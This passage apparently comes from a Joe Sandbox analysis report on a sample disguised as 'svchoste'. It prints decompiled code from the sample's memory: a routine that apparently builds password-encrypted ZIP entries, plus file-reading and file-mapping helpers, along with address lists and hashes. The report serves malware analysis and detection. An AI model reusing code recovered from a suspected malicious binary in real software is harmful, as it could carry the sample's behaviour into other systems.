				signed int _v28;
				signed int _v32;
				signed int _v33;
				signed int _v34;
				char _v48;
				char _v316;
				signed int _v320;
				signed int _v321;
				signed int _v328;
				void* _v332;
				char _v336;
				char _v337;
				char _v338;
				char _v339;
				char _v340;
				char _v341;
				char _v342;
				char _v343;
				char _v344;
				char _v345;
				char _v346;
				char _v347;
				char _v348;
				char _v349;
				char _v350;
				char _v351;
				char _v352;
				signed int _v360;
				signed int _v364;
				signed int _v372;
				char _v632;
				char _v892;
				signed int _v896;
				signed int _v900;
				signed int _v904;
				char _v1164;
				intOrPtr _v1168;
				signed int _v1172;
				short _v1176;
				short _v1178;
				short _v1180;
				signed int _v1184;
				signed int _v1188;
				signed int _v1192;
				signed int _v1196;
				signed int _v1200;
				signed int _v1204;
				signed int _v1208;
				unsigned int _v1212;
				signed int _v1214;
				signed int _v1216;
				short _v1218;
				char _v1220;
				signed int _v1224;
				signed int _v1228;
				signed char* _v1232;
				signed int _v1236;
				signed int _v1240;
				signed int _v1244;
				signed int _v1248;
				void* _v1252;
				signed int* _v1256;
				signed int _v1260;
				char* _v1264;
				intOrPtr _v1268;
				char _v1269;
				intOrPtr* _v1276;
				signed int _v1280;
				char _v1281;
				intOrPtr _v1288;
				signed int _v1292;
				intOrPtr* _v1296;
				char* _v1300;
				intOrPtr _v1304;
				char _v1305;
				intOrPtr* _v1312;
				signed int _v1316;
				char _v1317;
				signed int _v1324;
				signed int _v1328;
				char _v1329;
				signed int _v1336;
				signed int _v1340;
				void* __edi;
				void* __esi;
				signed int _t417;
				signed int _t429;
				char _t432;
				signed int _t466;
				signed int _t469;
				signed int* _t472;
				signed char _t503;
				signed int _t505;
				signed char _t507;
				signed int _t510;
				signed char _t516;
				signed int _t518;
				signed int _t522;
				signed int _t523;
				signed int _t536;
				signed int _t540;
				signed char _t541;
				signed int _t544;
				void* _t548;
				signed int* _t550;
				char _t567;
				intOrPtr* _t589;
				signed int* _t604;
				signed int _t612;
				signed int _t623;
				signed int _t630;
				signed int _t636;
				signed int* _t640;
				intOrPtr _t649;
				signed int _t662;
				signed int _t707;
				signed int _t720;
				signed int _t725;
				intOrPtr _t726;
				signed int _t736;
				void* _t737;
				void* _t738;

				_t548 = __ebx;
				_t417 =  *0xba01f4; // 0xac8b3e58
				_v12 = _t417 ^ _t736;
				_v1256 = __ecx;
				if(_v1256[5] == 0) {
					_t550 = _v1256;
					__eflags =  *(_t550 + 0x2c) & 0x000000ff;
					if(( *(_t550 + 0x2c) & 0x000000ff) == 0) {
						_v328 = 0;
						__eflags =  *_v1256;
						if( *_v1256 != 0) {
							__eflags = _a16 - 4;
							if(_a16 != 4) {
								_v328 = 0xc;
							}
						}
						_v1260 = _a4;
						_v1264 =  &_v316;
						_v1268 = _v1264;
						do {
							_v1269 =  *_v1260;
							 *_v1264 = _v1269;
							_t656 = _v1260 + 1;
							_v1260 = _v1260 + 1;
							_v1264 = _v1264 + 1;
							__eflags = _v1269;
						} while (_v1269 != 0);
						__eflags = _v316;
						if(_v316 != 0) {
							_t656 =  &_v316;
							_v1228 =  &_v316;
							while(1) {
								__eflags =  *_v1228;
								if( *_v1228 == 0) {
									break;
								}
								__eflags =  *_v1228 - 0x5c;
								if( *_v1228 == 0x5c) {
									 *_v1228 = 0x2f;
								}
								_t656 = _v1228 + 1;
								_v1228 = _v1228 + 1;
							}
							__eflags = _a16 - 4;
							_v33 = 0 | _a16 == 0x00000004;
							__eflags = _v33 & 0x000000ff;
							if((_v33 & 0x000000ff) == 0) {
								L21:
								_v1292 = 0;
								L22:
								_v34 = _v1292;
								_v32 = 8;
								__eflags = _v33 & 0x000000ff;
								if((_v33 & 0x000000ff) != 0) {
									L24:
									_v32 = 0;
									L25:
									__eflags = _a16 - 2;
									if(_a16 != 2) {
										__eflags = _a16 - 1;
										if(_a16 != 1) {
											__eflags = _a16 - 3;
											if(_a16 != 3) {
												__eflags = _a16 - 4;
												if(__eflags != 0) {
													_t429 = 0x10000;
													L118:
													return E00B74354(_t429, _t548, _v12 ^ _t736, _t656, _t731, _t734);
												}
												_v28 = E00B84B50(_t548, _v1256, _t731, _t734, __eflags);
												L34:
												__eflags = _v28;
												if(_v28 == 0) {
													_v360 = 0;
													_t432 =  *0xb992cf; // 0x0
													_v1164 = _t432;
													_v1296 =  &_v316;
													_v1300 =  &_v892;
													_v1304 = _v1300;
													do {
														_v1305 =  *_v1296;
														 *_v1300 = _v1305;
														_v1296 = _v1296 + 1;
														_v1300 = _v1300 + 1;
														__eflags = _v1305;
													} while (_v1305 != 0);
													_v1312 =  &_v892;
													_t662 = _v1312 + 1;
													__eflags = _t662;
													_v1316 = _t662;
													do {
														_v1317 =  *_v1312;
														_v1312 = _v1312 + 1;
														__eflags = _v1317;
													} while (_v1317 != 0);
													_v1324 = _v1312 - _v1316;
													_v1196 = _v1324;
													__eflags = _v34 & 0x000000ff;
													if((_v34 & 0x000000ff) == 0) {
														L44:
														_t567 =  *0xb993ad; // 0x0
														_v632 = _t567;
														_v904 = 0;
														_v1192 = 0;
														_v900 = 0;
														_v1188 = 0;
														_v896 = 0;
														_v1184 = 0;
														_v372 = 1;
														_v364 = 0;
														_v1178 = 0;
														_v1220 = 0xb17;
														_v1218 = 0x14;
														_v1212 = _v1256[0x1a];
														_v1208 = 0;
														_v1216 = 8;
														__eflags =  *_v1256;
														if( *_v1256 != 0) {
															__eflags = _v33 & 0x000000ff;
															if((_v33 & 0x000000ff) == 0) {
																_v1216 = 9;
															}
														}
														_v1176 = _v1216;
														_v1214 = _v32;
														__eflags = _v32;
														if(_v32 != 0) {
															L50:
															_v1336 = 0;
															goto L51;
														} else {
															_t640 = _v1256;
															__eflags =  *(_t640 + 0x70);
															if( *(_t640 + 0x70) < 0) {
																goto L50;
															}
															_v1336 = _v1256[0x1c] + _v328;
															L51:
															_v1204 = _v1336;
															_v1200 = _v1256[0x1c];
															_v1180 = 0;
															_v1172 = _v1256[0x13];
															_v1168 = _v1256[6] + _v1256[4];
															_v904 =  &_v352;
															_v1192 = 0x11;
															_v900 =  &_v48;
															_v1188 = 9;
															_v352 = 0x55;
															_v351 = 0x54;
															_v350 = 0xd;
															_v349 = 0;
															_v348 = 7;
															_v347 = _v1256[0x16];
															_v346 = E00B95690(_v1256[0x16], 8, _v1256[0x17]);
															_v345 = E00B95690(_v1256[0x16], 0x10, _v1256[0x17]);
															_v344 = E00B95690(_v1256[0x16], 0x18, _v1256[0x17]);
															_v343 = _v1256[0x14];
															_v342 = E00B95690(_v1256[0x14], 8, _v1256[0x15]);
															_v341 = E00B95690(_v1256[0x14], 0x10, _v1256[0x15]);
															_v340 = E00B95690(_v1256[0x14], 0x18, _v1256[0x15]);
															_v339 = _v1256[0x18];
															_v338 = E00B95690(_v1256[0x18], 8, _v1256[0x19]);
															_v337 = E00B95690(_v1256[0x18], 0x10, _v1256[0x19]);
															_v336 = E00B95690(_v1256[0x18], 0x18, _v1256[0x19]);
															_t466 = _v904;
															_t589 = _v900;
															 *_t589 =  *_t466;
															 *((intOrPtr*)(_t589 + 4)) =  *((intOrPtr*)(_t466 + 4));
															 *((char*)(_t589 + 8)) =  *((intOrPtr*)(_t466 + 8));
															 *((char*)(_v900 + 2)) = 5;
															_t656 = _v1256;
															_t469 = E00B83C90( &_v1220, E00B87110, _v1256); // executed
															_t738 = _t737 + 0xc;
															_v1224 = _t469;
															__eflags = _v1224;
															if(_v1224 == 0) {
																_t656 = _v1256;
																_v1256[6] = _v1196 + _v1192 + 0x1e + _v1256[6];
																_t472 = _v1256;
																__eflags =  *(_t472 + 0x14);
																if( *(_t472 + 0x14) == 0) {
																	_v1256[0xc] = 0x12345678;
																	_v1256[0xd] = 0x23456789;
																	_v1256[0xe] = 0x34567890;
																	_v1232 =  *_v1256;
																	while(1) {
																		__eflags = _v1232;
																		if(_v1232 == 0) {
																			break;
																		}
																		__eflags =  *_v1232;
																		if( *_v1232 == 0) {
																			break;
																		}
																		E00B82FE0( &(_v1256[0xc]),  *_v1232 & 0x000000ff);
																		_t738 = _t738 + 8;
																		_t636 =  &(_v1232[1]);
																		__eflags = _t636;
																		_v1232 = _t636;
																	}
																	__eflags =  *0xba2aac & 0x000000ff;
																	if(( *0xba2aac & 0x000000ff) == 0) {
																		_t522 = GetTickCount();
																		_t523 = GetDesktopWindow();
																		_t734 = _t522 ^ _t523;
																		__eflags = _t522 ^ _t523;
																		E00B76DA4(_t522 ^ _t523);
																		_t738 = _t738 + 4;
																	}
																	_v1236 = 0;
																	while(1) {
																		__eflags = _v1236 - 0xc;
																		if(__eflags >= 0) {
																			break;
																		}
																		 *((char*)(_t736 + _v1236 - 0x14)) = E00B76DB6(__eflags) >> 0x00000007 & 0x000000ff;
																		_t720 = _v1236 + 1;
																		__eflags = _t720;
																		_v1236 = _t720;
																	}
																	_v13 = _v1212 >> 0x00000008 & 0x000000ff;
																	_v1240 = 0;
																	while(1) {
																		__eflags = _v1240 - 0xc;
																		if(__eflags >= 0) {
																			break;
																		}
																		_t516 = E00B85150(_v1240, __eflags,  &(_v1256[0xc]),  *(_t736 + _v1240 - 0x14) & 0x000000ff);
																		_t738 = _t738 + 8;
																		 *(_t736 + _v1240 - 0x14) = _t516;
																		_t518 = _v1240 + 1;
																		__eflags = _t518;
																		_v1240 = _t518;
																	}
																	__eflags =  *_v1256;
																	if( *_v1256 != 0) {
																		__eflags = _v33 & 0x000000ff;
																		if((_v33 & 0x000000ff) == 0) {
																			E00B87110( &_v24, _v1256,  &_v24, 0xc);
																			_t738 = _t738 + 0xc;
																			_t630 = _v1256[6] + 0xc;
																			__eflags = _t630;
																			_v1256[6] = _t630;
																		}
																	}
																	_v8 = 0;
																	__eflags =  *_v1256;
																	if( *_v1256 == 0) {
																		L76:
																		_v1340 = 0;
																		goto L77;
																	} else {
																		__eflags = _v33 & 0x000000ff;
																		if((_v33 & 0x000000ff) != 0) {
																			goto L76;
																		}
																		_v1340 = 1;
																		L77:
																		_v1256[0xb] = _v1340;
																		__eflags = _v33 & 0x000000ff;
																		if((_v33 & 0x000000ff) != 0) {
																			L80:
																			__eflags = _v33 & 0x000000ff;
																			if((_v33 & 0x000000ff) != 0) {
																				L83:
																				__eflags = _v33 & 0x000000ff;
																				if((_v33 & 0x000000ff) != 0) {
																					_v1256[0x24] = 0;
																				}
																				L85:
																				_v1256[0xb] = 0;
																				E00B82B90(_v1256);
																				_v1256[6] = _v1256[6] + _v1256[0x24];
																				_t656 = _v1256;
																				__eflags =  *(_t656 + 0x14);
																				if( *(_t656 + 0x14) == 0) {
																					__eflags = _v8;
																					if(_v8 == 0) {
																						__eflags = _v1204 - _v1256[0x24] + _v328;
																						_v321 = 0 | _v1204 == _v1256[0x24] + _v328;
																						_v1208 = _v1256[0x1e];
																						_v1204 = _v1256[0x24] + _v328;
																						_v1200 = _v1256[0x1c];
																						_t604 = _v1256;
																						__eflags =  *(_t604 + 0x1c) & 0x000000ff;
																						if(( *(_t604 + 0x1c) & 0x000000ff) == 0) {
																							L101:
																							_t656 = _v1214 & 0x0000ffff;
																							__eflags = (_v1214 & 0x0000ffff) - (_v32 & 0x0000ffff);
																							if((_v1214 & 0x0000ffff) == (_v32 & 0x0000ffff)) {
																								__eflags = _v32;
																								if(_v32 != 0) {
																									L106:
																									_t656 = _v1256;
																									_v1224 = E00B83AA0( &_v1220, E00B87110, _v1256);
																									__eflags = _v1224;
																									if(_v1224 == 0) {
																										_t707 = _v1256[6] + 0x10;
																										__eflags = _t707;
																										_v1256[6] = _t707;
																										_v1216 = _v1176;
																										L109:
																										_t656 = _v1256;
																										__eflags = _v1256[5];
																										if(__eflags == 0) {
																											_v1248 = E00B74E60(_t731, _t734, __eflags, _v1188);
																											_v320 = _v1248;
																											E00B79240(_v320, _v900, _v1188);
																											_v900 = _v320;
																											_v1252 = E00B74E60(_t731, _t734, __eflags, 0x360);
																											_v332 = _v1252;
																											_t734 =  &_v1220;
																											memcpy(_v332, _t734, 0xd8 << 2);
																											_t731 = _t734 + 0x1b0;
																											_t656 = _v1256;
																											__eflags =  *(_t656 + 0x44);
																											if( *(_t656 + 0x44) != 0) {
																												_v1244 = _v1256[0x11];
																												while(1) {
																													_t612 = _v1244;
																													__eflags =  *(_t612 + 0x35c);
																													if( *(_t612 + 0x35c) == 0) {
																														break;
																													}
																													_v1244 =  *((intOrPtr*)(_v1244 + 0x35c));
																												}
																												_t656 = _v332;
																												 *((intOrPtr*)(_v1244 + 0x35c)) = _v332;
																												L117:
																												_t429 = 0;
																												__eflags = 0;
																												goto L118;
																											}
																											_v1256[0x11] = _v332;
																											goto L117;
																										}
																										_t429 = _v1256[5];
																										goto L118;
																									}
																									_t429 = 0x400;
																									goto L118;
																								}
																								__eflags = _v321 & 0x000000ff;
																								if((_v321 & 0x000000ff) != 0) {
																									goto L106;
																								}
																								_t429 = 0x4000000;
																								goto L118;
																							}
																							_t429 = 0x4000000;
																							goto L118;
																						}
																						__eflags =  *_v1256;
																						if( *_v1256 == 0) {
																							L92:
																							_v1214 = _v32;
																							__eflags = _v1216 & 1;
																							if((_v1216 & 1) == 0) {
																								_t623 = _v1216 & 0xfff7;
																								__eflags = _t623;
																								_v1216 = _t623;
																							}
																							_v1176 = _v1216;
																							_t503 = E00B82C20(_v1256, _v1168 - _v1256[4]); // executed
																							_t656 = _t503 & 0x000000ff;
																							__eflags = _t503 & 0x000000ff;
																							if((_t503 & 0x000000ff) != 0) {
																								_t505 = E00B83C90( &_v1220, E00B87110, _v1256); // executed
																								_v1224 = _t505;
																								__eflags = _v1224;
																								if(_v1224 == 0) {
																									_t656 = _v1256;
																									_t507 = E00B82C20(_v1256, _v1256[6]); // executed
																									__eflags = _t507 & 0x000000ff;
																									if((_t507 & 0x000000ff) != 0) {
																										goto L109;
																									}
																									_t429 = 0x2000000;
																									goto L118;
																								}
																								_t429 = 0x400;
																							} else {
																								_t429 = 0x2000000;
																							}
																							goto L118;
																						}
																						__eflags = _v33 & 0x000000ff;
																						if((_v33 & 0x000000ff) == 0) {
																							goto L101;
																						}
																						goto L92;
																					}
																					_t429 = 0x400;
																					goto L118;
																				}
																				_t429 = _v1256[5];
																				goto L118;
																			}
																			__eflags = _v32;
																			if(__eflags != 0) {
																				goto L83;
																			}
																			_v8 = E00B87800(_v1256, _t731, _t734, __eflags);
																			goto L85;
																		}
																		__eflags = _v32 - 8;
																		if(_v32 != 8) {
																			goto L80;
																		}
																		_t510 = E00B88760(_t548, _v1256, _t731, _t734,  &_v1220); // executed
																		_v8 = _t510;
																		goto L85;
																	}
																}
																E00B82B90(_v1256);
																_t429 = _v1256[5];
																goto L118;
															}
															E00B82B90(_v1256);
															_t429 = 0x400;
															goto L118;
														}
													}
													_t725 =  &_v892 + 0xffffffff;
													__eflags = _t725;
													_v1328 = _t725;
													do {
														_v1329 =  *((intOrPtr*)(_v1328 + 1));
														_v1328 = _v1328 + 1;
														__eflags = _v1329;
													} while (_v1329 != 0);
													_t731 = _v1328;
													_t726 =  *0xb99b2c; // 0x2f
													 *_v1328 = _t726;
													_t536 = _v1196 + 1;
													__eflags = _t536;
													_v1196 = _t536;
													goto L44;
												}
												_t429 = _v28;
												goto L118;
											}
											_t656 = _a8;
											_v28 = E00B84C60(_t548, _v1256, _t731, _t734, _a8, _a12);
											goto L34;
										}
										_t656 = _a12;
										_v28 = E00B86D00(_t548, _v1256, _t731, _t734, _a8, _a12);
										goto L34;
									}
									_t540 = E00B86EC0(_v1256, _a8); // executed
									_v28 = _t540;
									goto L34;
								}
								_t656 =  &_v316;
								_t541 = E00B85000( &_v316);
								_t737 = _t737 + 4;
								__eflags = _t541 & 0x000000ff;
								if((_t541 & 0x000000ff) == 0) {
									goto L25;
								}
								goto L24;
							}
							_v1276 =  &_v316;
							_t544 = _v1276 + 1;
							__eflags = _t544;
							_v1280 = _t544;
							do {
								_v1281 =  *_v1276;
								_v1276 = _v1276 + 1;
								__eflags = _v1281;
							} while (_v1281 != 0);
							_v1288 = _v1276 - _v1280;
							_t649 = _v1288;
							_t656 =  *((char*)(_t736 + _t649 - 0x139));
							__eflags =  *((char*)(_t736 + _t649 - 0x139)) - 0x2f;
							if( *((char*)(_t736 + _t649 - 0x139)) == 0x2f) {
								goto L21;
							}
							_v1292 = 1;
							goto L22;
						}
						_t429 = 0x10000;
						goto L118;
					}
					_t429 = 0x50000;
					goto L118;
				}
				_t429 = 0x40000;
				goto L118;
			}

0x00b888d0
0x00b888d9
0x00b888e0
0x00b888e5
0x00b888f5
0x00b88901
0x00b8890b
0x00b8890d
0x00b88919
0x00b88929
0x00b8892c
0x00b8892e
0x00b88932
0x00b88934
0x00b88934
0x00b88932
0x00b88941
0x00b8894d
0x00b88959
0x00b8895f
0x00b88967
0x00b88979
0x00b88981
0x00b88984
0x00b88993
0x00b88999
0x00b88999
0x00b889a9
0x00b889ab
0x00b889b7
0x00b889bd
0x00b889c3
0x00b889cc
0x00b889ce
0x00000000
0x00000000
0x00b889d9
0x00b889dc
0x00b889e4
0x00b889e4
0x00b889ed
0x00b889f0
0x00b889f0
0x00b889fa
0x00b88a01
0x00b88a08
0x00b88a0a
0x00b88a76
0x00b88a76
0x00b88a80
0x00b88a86
0x00b88a89
0x00b88a94
0x00b88a96
0x00b88aae
0x00b88aae
0x00b88ab5
0x00b88ab5
0x00b88ab9
0x00b88acf
0x00b88ad3
0x00b88aed
0x00b88af1
0x00b88b0b
0x00b88b0f
0x00b88b21
0x00b894f7
0x00b89504
0x00b89504
0x00b88b1c
0x00b88b2b
0x00b88b2b
0x00b88b2f
0x00b88b39
0x00b88b43
0x00b88b48
0x00b88b54
0x00b88b60
0x00b88b6c
0x00b88b72
0x00b88b7a
0x00b88b8c
0x00b88b97
0x00b88ba6
0x00b88bac
0x00b88bac
0x00b88bbb
0x00b88bc7
0x00b88bc7
0x00b88bca
0x00b88bd0
0x00b88bd8
0x00b88bde
0x00b88be5
0x00b88be5
0x00b88bfa
0x00b88c06
0x00b88c10
0x00b88c12
0x00b88c61
0x00b88c61
0x00b88c67
0x00b88c6d
0x00b88c77
0x00b88c81
0x00b88c8b
0x00b88c95
0x00b88c9f
0x00b88ca9
0x00b88cb3
0x00b88cbf
0x00b88ccb
0x00b88cd7
0x00b88ce7
0x00b88ced
0x00b88cfc
0x00b88d09
0x00b88d0c
0x00b88d12
0x00b88d14
0x00b88d1b
0x00b88d1b
0x00b88d14
0x00b88d29
0x00b88d34
0x00b88d3b
0x00b88d3f
0x00b88d64
0x00b88d64
0x00000000
0x00b88d41
0x00b88d41
0x00b88d47
0x00b88d4b
0x00000000
0x00000000
0x00b88d5c
0x00b88d6e
0x00b88d74
0x00b88d83
0x00b88d8b
0x00b88d9b
0x00b88db3
0x00b88dbf
0x00b88dc5
0x00b88dd2
0x00b88dd8
0x00b88de2
0x00b88de9
0x00b88df0
0x00b88df7
0x00b88dfe
0x00b88e0e
0x00b88e27
0x00b88e40
0x00b88e59
0x00b88e68
0x00b88e81
0x00b88e9a
0x00b88eb3
0x00b88ec2
0x00b88edb
0x00b88ef4
0x00b88f0d
0x00b88f13
0x00b88f19
0x00b88f21
0x00b88f26
0x00b88f2c
0x00b88f35
0x00b88f39
0x00b88f4c
0x00b88f51
0x00b88f54
0x00b88f5a
0x00b88f61
0x00b88f91
0x00b88f97
0x00b88f9a
0x00b88fa0
0x00b88fa4
0x00b88fc5
0x00b88fd2
0x00b88fdf
0x00b88fee
0x00b89005
0x00b89005
0x00b8900c
0x00000000
0x00000000
0x00b89017
0x00b89019
0x00000000
0x00000000
0x00b8902f
0x00b89034
0x00b88ffc
0x00b88ffc
0x00b88fff
0x00b88fff
0x00b89040
0x00b89042
0x00b89044
0x00b8904c
0x00b89052
0x00b89052
0x00b89055
0x00b8905a
0x00b8905a
0x00b8905d
0x00b89078
0x00b89078
0x00b8907f
0x00000000
0x00000000
0x00b89094
0x00b8906f
0x00b8906f
0x00b89072
0x00b89072
0x00b890a9
0x00b890ac
0x00b890c7
0x00b890c7
0x00b890ce
0x00000000
0x00000000
0x00b890e6
0x00b890eb
0x00b890f4
0x00b890be
0x00b890be
0x00b890c1
0x00b890c1
0x00b89100
0x00b89103
0x00b89109
0x00b8910b
0x00b8911a
0x00b8911f
0x00b8912b
0x00b8912b
0x00b89134
0x00b89134
0x00b8910b
0x00b89137
0x00b89144
0x00b89147
0x00b8915d
0x00b8915d
0x00000000
0x00b89149
0x00b8914d
0x00b8914f
0x00000000
0x00000000
0x00b89151
0x00b89167
0x00b89173
0x00b8917a
0x00b8917c
0x00b8919b
0x00b8919f
0x00b891a1
0x00b891b9
0x00b891bd
0x00b891bf
0x00b891c7
0x00b891c7
0x00b891d1
0x00b891d7
0x00b891e1
0x00b89201
0x00b89204
0x00b8920a
0x00b8920e
0x00b8921e
0x00b89222
0x00b89242
0x00b8924b
0x00b8925a
0x00b89272
0x00b89281
0x00b89287
0x00b89291
0x00b89293
0x00b89371
0x00b89371
0x00b8937c
0x00b8937e
0x00b8938a
0x00b8938e
0x00b893a5
0x00b893a5
0x00b893c0
0x00b893c6
0x00b893cd
0x00b893e2
0x00b893e2
0x00b893eb
0x00b893f5
0x00b893fc
0x00b893fc
0x00b89402
0x00b89406
0x00b89425
0x00b89431
0x00b8944c
0x00b8945a
0x00b8946d
0x00b89479
0x00b89484
0x00b89490
0x00b89490
0x00b89492
0x00b89498
0x00b8949c
0x00b894b8
0x00b894be
0x00b894be
0x00b894c4
0x00b894cb
0x00000000
0x00000000
0x00b894d9
0x00b894d9
0x00b894e7
0x00b894ed
0x00b894f3
0x00b894f3
0x00b894f3
0x00000000
0x00b894f3
0x00b894aa
0x00000000
0x00b894aa
0x00b8940e
0x00000000
0x00b8940e
0x00b893cf
0x00000000
0x00b893cf
0x00b89397
0x00b89399
0x00000000
0x00000000
0x00b8939b
0x00000000
0x00b8939b
0x00b89380
0x00000000
0x00b89380
0x00b8929f
0x00b892a2
0x00b892b0
0x00b892b4
0x00b892c2
0x00b892c5
0x00b892ce
0x00b892ce
0x00b892d1
0x00b892d1
0x00b892df
0x00b892fc
0x00b89301
0x00b89304
0x00b89306
0x00b89325
0x00b8932d
0x00b89333
0x00b8933a
0x00b89346
0x00b89356
0x00b8935e
0x00b89360
0x00000000
0x00b8936c
0x00b89362
0x00000000
0x00b89362
0x00b8933c
0x00b89308
0x00b89308
0x00b89308
0x00000000
0x00b89306
0x00b892a8
0x00b892aa
0x00000000
0x00000000
0x00000000
0x00b892aa
0x00b89224
0x00000000
0x00b89224
0x00b89216
0x00000000
0x00b89216
0x00b891a3
0x00b891a7
0x00000000
0x00000000
0x00b891b4
0x00000000
0x00b891b4
0x00b8917e
0x00b89182
0x00000000
0x00000000
0x00b89191
0x00b89196
0x00000000
0x00b89196
0x00b89147
0x00b88fac
0x00b88fb7
0x00000000
0x00b88fb7
0x00b88f69
0x00b88f6e
0x00000000
0x00b88f6e
0x00b88d3f
0x00b88c1a
0x00b88c1a
0x00b88c1d
0x00b88c23
0x00b88c2c
0x00b88c32
0x00b88c39
0x00b88c39
0x00b88c42
0x00b88c48
0x00b88c4f
0x00b88c58
0x00b88c58
0x00b88c5b
0x00000000
0x00b88c5b
0x00b88b31
0x00000000
0x00b88b31
0x00b88af7
0x00b88b06
0x00000000
0x00b88b06
0x00b88ad5
0x00b88ae8
0x00000000
0x00b88ae8
0x00b88ac5
0x00b88aca
0x00000000
0x00b88aca
0x00b88a98
0x00b88a9f
0x00b88aa4
0x00b88aaa
0x00b88aac
0x00000000
0x00000000
0x00000000
0x00b88aac
0x00b88a12
0x00b88a1e
0x00b88a1e
0x00b88a21
0x00b88a27
0x00b88a2f
0x00b88a35
0x00b88a3c
0x00b88a3c
0x00b88a51
0x00b88a57
0x00b88a5d
0x00b88a65
0x00b88a68
0x00000000
0x00000000
0x00b88a6a
0x00000000
0x00b88a6a
0x00b889ad
0x00000000
0x00b889ad
0x00b8890f
0x00000000
0x00b8890f
0x00b888f7
0x00000000

Strings

U, xrefs: 00B88DE2
T, xrefs: 00B88DE9

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID:
String ID: T$U
API String ID: 0-2115836835
Opcode ID: 12cdf8f77d11295fec1c24fb66e4be0867837ad5542e1b218274b560fad21233
Instruction ID: de6f137b3ade9237c9b6b88f982c5ab811dc5791878183a2ae05f185bf2b7ef7
Opcode Fuzzy Hash: 12cdf8f77d11295fec1c24fb66e4be0867837ad5542e1b218274b560fad21233
Instruction Fuzzy Hash: B37213B49052A98BCB24DF14C994BEEBBF6BF85304F1480DAD6096B352D7309E85CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00B8CC40, Relevance: 9.1, APIs: 6, Instructions: 77
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00B8CC40(CHAR* _a4, void** _a8, long* _a12) {
				struct _OVERLAPPED* _v8;
				long _v12;
				void* _v16;
				intOrPtr _v24;
				long _v28;
				long _v32;
				void* _t30;
				void* _t36;
				int _t39;

				_v8 = 0;
				_v16 = 0;
				_t30 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0, 0); // executed
				_v16 = _t30;
				if(_v16 == 0 || _v16 == 0xffffffff) {
					L12:
					return _v8;
				} else {
					_push( &_v28);
					_push(_v16);
					if( *0xba276c() != 0 && _v24 == 0) {
						 *_a12 = _v28;
						_t36 = LocalAlloc(0x40,  *_a12); // executed
						 *_a8 = _t36;
						if( *_a8 != 0) {
							_t39 = ReadFile(_v16,  *_a8,  *_a12,  &_v12, 0); // executed
							if(_t39 == 0 ||  *_a12 != _v12) {
								_v32 = 0;
							} else {
								_v32 = 1;
							}
							_v8 = _v32;
							if(_v8 == 0) {
								LocalFree( *_a8);
							}
						}
					}
					FindCloseChangeNotification(_v16); // executed
					goto L12;
				}
			}

0x00b8cc46
0x00b8cc4d
0x00b8cc67
0x00b8cc6d
0x00b8cc74
0x00b8cd1b
0x00b8cd21
0x00b8cc84
0x00b8cc87
0x00b8cc8b
0x00b8cc94
0x00b8cca2
0x00b8ccac
0x00b8ccb5
0x00b8ccbd
0x00b8ccd5
0x00b8ccdd
0x00b8ccf2
0x00b8cce9
0x00b8cce9
0x00b8cce9
0x00b8ccfc
0x00b8cd03
0x00b8cd0b
0x00b8cd0b
0x00b8cd03
0x00b8ccbd
0x00b8cd15
0x00000000
0x00b8cd15

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B8CC67
GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B8CC8C
LocalAlloc.KERNEL32(00000040,?), ref: 00B8CCAC
ReadFile.KERNEL32(000000FF,?,000000FF,?,00000000), ref: 00B8CCD5
LocalFree.KERNEL32 ref: 00B8CD0B
FindCloseChangeNotification.KERNEL32(000000FF), ref: 00B8CD15

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: File$Local$AllocChangeCloseCreateFindFreeNotificationReadSize
String ID:
API String ID: 1815715184-0
Opcode ID: abc68e2b7dcca13fef34d1233e049e08436fb74994d3a87b85653878d2d10a50
Instruction ID: fcdb56b77a0235599cd62ee48105d0bcc4d9cd5e81b9b59267b19bc37f3eabe0
Opcode Fuzzy Hash: abc68e2b7dcca13fef34d1233e049e08436fb74994d3a87b85653878d2d10a50
Instruction Fuzzy Hash: A131EFB4A00209EFDB14DF94D885BAEBBB5FF49700F1081A9FD15A7290D774AA41CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00B82CB0, Relevance: 7.7, APIs: 5, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B82CB0(intOrPtr __ecx, void* _a4, long _a8, intOrPtr _a12) {
				long _v8;
				void* _v12;
				CHAR* _v16;
				long _v20;
				intOrPtr _v24;
				void* _t103;

				_v24 = __ecx;
				if( *(_v24 + 4) != 0 ||  *(_v24 + 0xc) != 0 ||  *((intOrPtr*)(_v24 + 0x20)) != 0 ||  *((intOrPtr*)(_v24 + 0x18)) != 0 ||  *((intOrPtr*)(_v24 + 0x14)) != 0 || ( *(_v24 + 0x2c) & 0x000000ff) != 0) {
					return 0x1000000;
				} else {
					if(_a12 != 1) {
						if(_a12 != 2) {
							if(_a12 != 3) {
								return 0x10000;
							}
							_v20 = _a8;
							if(_v20 != 0) {
								if(_a4 == 0) {
									 *(_v24 + 0xc) = CreateFileMappingA(0xffffffff, 0, 4, 0, _v20, 0);
									if( *(_v24 + 0xc) != 0) {
										 *((intOrPtr*)(_v24 + 0x20)) = MapViewOfFile( *(_v24 + 0xc), 0xf001f, 0, 0, _v20);
										if( *((intOrPtr*)(_v24 + 0x20)) != 0) {
											L25:
											 *(_v24 + 0x1c) = 1;
											 *(_v24 + 0x24) = 0;
											 *(_v24 + 0x28) = _v20;
											return 0;
										}
